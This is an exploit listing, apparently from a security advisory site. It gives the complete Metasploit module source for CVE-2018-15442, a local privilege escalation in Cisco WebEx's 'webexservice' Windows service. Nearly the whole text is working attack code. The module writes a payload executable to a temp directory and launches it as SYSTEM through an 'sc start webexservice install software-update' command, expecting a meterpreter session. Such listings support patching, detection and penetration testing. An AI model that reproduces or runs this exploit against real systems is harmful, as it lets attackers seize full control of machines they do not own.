WebEx Local Service Permissions Code Execution

Credit: Jeff McJunkin
Risk: High
Local: Yes
Remote: No

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Services include Msf::Post::Windows::Accounts def initialize(info={}) super( update_info( info, 'Name' => 'WebEx Local Service Permissions Exploit', 'Description' => %q{ This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations. }, 'References' => [ ['URL', 'https://webexec.org'], ['CVE', '2018-15442'] ], 'DisclosureDate' => "Oct 09 2018", 'License' => MSF_LICENSE, 'Author' => [ 'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>' ], 'Platform' => [ 'win'], 'Targets' => [ [ 'Automatic', {} ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'SessionTypes' => [ "meterpreter" ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 5, 'ReverseConnectRetries' => 255 }, 'DefaultTarget' => 0 )) register_options([ OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"]) ]) @service_name = 'webexservice' end def validate_arch return target unless target.name == 'Automatic' case sysinfo['Architecture'] when 'x86' fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64' vprint_status('Detected x86 system') return targets[1] when 'x64' vprint_status('Detected x64 system') return targets[2] end end def check_service_exists?(service) srv_info = service_info(service) if srv_info.nil? vprint_warning("Unable to enumerate services.") return false end if srv_info && srv_info[:display].empty? vprint_warning("Service #{service} does not exist.") return false else return true end end def check unless check_service_exists?(@service_name) return Exploit::CheckCode::Safe end srv_info = service_info(@service_name) vprint_status(srv_info.to_s) case START_TYPE[srv_info[:starttype]] when 'Disabled' vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Manual' vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Auto' vprint_good("Service is set to Automatically start...") end if check_search_path return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def check_write_access(path) perm = check_dir_perms(path, @token) if perm and perm.include?('W') print_good("Write permissions in #{path} - #{perm}") return true elsif perm vprint_status ("Permissions for #{path} - #{perm}") else vprint_status ("No permissions for #{path}") end return false end def exploit begin @token = get_imperstoken rescue Rex::Post::Meterpreter::RequestError vprint_error("Error while using get_imperstoken: #{e}") end fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token if is_system? fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.") end print_status("Checking service exists...") if !check_service_exists?(@service_name) fail_with(Failure::NoTarget, "The service doesn't exist.") end if is_uac_enabled? print_warning("UAC is enabled, may get false negatives on writable folders.") end # Use manually selected Dir file_path = datastore['DIR'] @exe_file_name = Rex::Text.rand_text_alphanumeric(8) @exe_file_path = "#{file_path}\\#{@exe_file_name}.exe" service_information = service_info(@service_name) # Check architecture valid_arch = validate_arch exe = generate_payload_exe(:arch => valid_arch.arch) # # Drop the malicious executable into the path # print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...") begin write_file(@exe_file_path, exe) register_file_for_cleanup(@exe_file_path) rescue Rex::Post::Meterpreter::RequestError => e # Can't write the file, can't go on fail_with(Failure::Unknown, e.message) end # # Run the service # print_status("Launching service...") res = cmd_exec("cmd.exe", "/c sc start webexservice install software-update 1 #{@exe_file_path}") if service_restart(@service_name) print_status("Service started...") else service_information = service_info(@service_name) if service_information[:starttype] == START_TYPE_AUTO if job_id print_status("Unable to start service, handler running waiting for a reboot...") while(true) break if session_created? select(nil,nil,nil,1) end else fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...") end else fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...") end end end end

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com


Back to Top